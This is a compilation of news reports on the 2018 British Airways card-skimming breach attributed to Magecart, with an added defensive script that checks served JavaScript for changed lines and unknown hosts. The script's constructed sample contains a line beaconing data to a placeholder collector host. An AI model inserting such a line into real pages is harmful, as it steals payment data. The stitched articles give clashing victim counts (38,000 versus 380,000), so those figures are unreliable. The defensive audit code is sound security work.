British Airways site had credit card skimming code injected

22 lines of JavaScript injected into Web, mobile apps raked in customer credit card data.

Thousands of BA customers had their credit card data "skimmed" by malicious JavaScript code inserted into the airline's website. (credit: Alf van Beem)

Last week, British Airways revealed that all the payment information processed through the airline's website and mobile app between August 21 and September 5 had been exposed. As many as 38,000 British Airways customers may have had their contact and financial information stolen in the breach, which evidence suggests was the result of malicious JavaScript code planted within British Airways' website.

According to a report by RiskIQ's Head Researcher Yonathan Klijnsma published Tuesday, RiskIQ detected the use of a script associated with a "threat group" RiskIQ calls Magecart, the same set of actors believed to be behind a recent credit card breach at Ticketmaster UK. While the Ticketmaster UK breach was the result of JavaScript being injected through a third-party service used by the Ticketmaster website, the British Airways breach was actually the result of a compromise of BA's own Web server, according to the RiskIQ analysis.

"This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer," said Klijnsma. "This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular."

British Airways breach caused by credit card skimming malware, researchers say

A security firm says credit card skimming malware installed by hackers on British Airways’ website a few months ago was to blame for a data breach of over 380,000 credit cards.

Payments through the airline’s website and mobile app were stolen over the three-week period, but a key clue was that travel information wasn’t affected.

Yonathan Klijnsma, a threat researcher at RiskIQ, suspected it might be the same group that was behind the Ticketmaster breach, in which hackers targeted a third party that loaded code on Ticketmaster’s various sites. From there, it could siphon off thousands of transactions.

This time, Klijnsma said the group took an even more “highly targeted approach,” describing a wave of attacks that the “Magecart” collective has used to steal thousands of records from various sites in recent months.

“This British Airways attack was just an extension of this campaign,” he said, prior to the release of his research.

His research, out Tuesday, points to hackers injecting code directly onto the company’s website, code that the airline shared between the website and the mobile app. Using his company’s proprietary web crawling technology, he found that code hosted on the airline’s global site was compromised on August 21 — the reported date of the breach — and malicious code was injected without anyone noticing.

When a customer bought plane tickets, the code would scrape the credit card information from the open payment page and forward the data to a fake site run by the hackers from a private server in Romania.

Names, billing addresses, email addresses, and all bank card details were collected by the code.
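
As an added illustration (not part of the original article or RiskIQ's report): because the injected code sat inside a script served from the airline's own site and went unnoticed, one defensive check is to compare each served first-party script against its reviewed baseline and report added lines and newly referenced hosts. The host names, allowlist and script contents below are constructed for the example.

```javascript
// Added example: integrity audit of a first-party script (all data constructed).
const crypto = require('node:crypto');

const sha384 = (text) =>
  crypto.createHash('sha384').update(text, 'utf8').digest('base64');

// Hosts the payment page's scripts are expected to contact (assumed allowlist).
const ALLOWED_HOSTS = new Set(['www.airline.example', 'pay.airline.example']);

// Collect every absolute http(s) hostname that appears in a script's source.
function referencedHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return hosts;
}

// Compare the script as served today with the copy that was reviewed at release.
function auditScript(baseline, served) {
  const expected = sha384(baseline);
  const actual = sha384(served);
  if (expected === actual) {
    return { changed: false, addedLines: [], unknownHosts: [] };
  }
  const knownLines = new Set(baseline.split('\n'));
  const baselineHosts = referencedHosts(baseline);
  // Lines present now that were not in the reviewed copy.
  const addedLines = served.split('\n').filter((l) => l.trim() && !knownLines.has(l));
  // Destinations that are neither allowlisted nor present at review time.
  const unknownHosts = [...referencedHosts(served)]
    .filter((h) => !ALLOWED_HOSTS.has(h) && !baselineHosts.has(h));
  return { changed: true, expected, actual, addedLines, unknownHosts };
}

// Constructed sample: a reviewed library file, and the same file with lines appended.
const BASELINE = [
  '/* ui-lib v1 (constructed) */',
  'function track(e) { fetch("https://www.airline.example/metrics", { method: "POST", body: e }); }',
].join('\n');

const SERVED = BASELINE + '\n' + [
  '// appended after release (constructed)',
  'function extra(d) { navigator.sendBeacon("https://collector.example.invalid/in", d); }',
].join('\n');

console.log(auditScript(BASELINE, BASELINE));
console.log(auditScript(BASELINE, SERVED));
```

Run on a schedule against the scripts the payment page actually loads, a check like this turns a silent modification into an alert that names the added lines and the new destination.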

“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately,” said Klijnsma. “This particular skimmer is very much attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer.”

That would explain why the financial data was collected but not the travel and passport data. It also explains why the mobile app was affected, Klijnsma said, because an analysis showed the mobile app also loaded the same data-scraping script.

“There’s so many ways they could have stolen the payment or [personal] information, they went for this really simple method, but it’s super effective,” said Klijnsma.

But, he said, “they went from super advanced to simplifying their attacks — and their [returns are] more insane than ever.”

British Airways spokesperson Liza Ravenscroft declined to comment, citing an ongoing criminal investigation.

British Airways customer data stolen in data breach

British Airways has confirmed a data breach.

The London-based airline, the largest in the UK, did not disclose much about the breach, only that hackers stole customer data from its website, ba.com.

In a statement, BA said that the “personal and financial details” of customers who made bookings on BA’s site or app between August 21 and September 5 were compromised, but travel or passport information was not taken.

A spokesperson told TechCrunch that “around 380,000 card payments” were compromised. BA had more than 45 million passengers last year.

“The breach has been resolved and our website is working normally,” the company said in a statement.

“British Airways is communicating with affected customers and we advise any customers who believe they may have been affected by this incident to contact their banks or credit card providers and follow their recommended advice,” said the statement.

Under the new European GDPR data protection laws, the airline can face fines of up to four percent of its global annual revenue.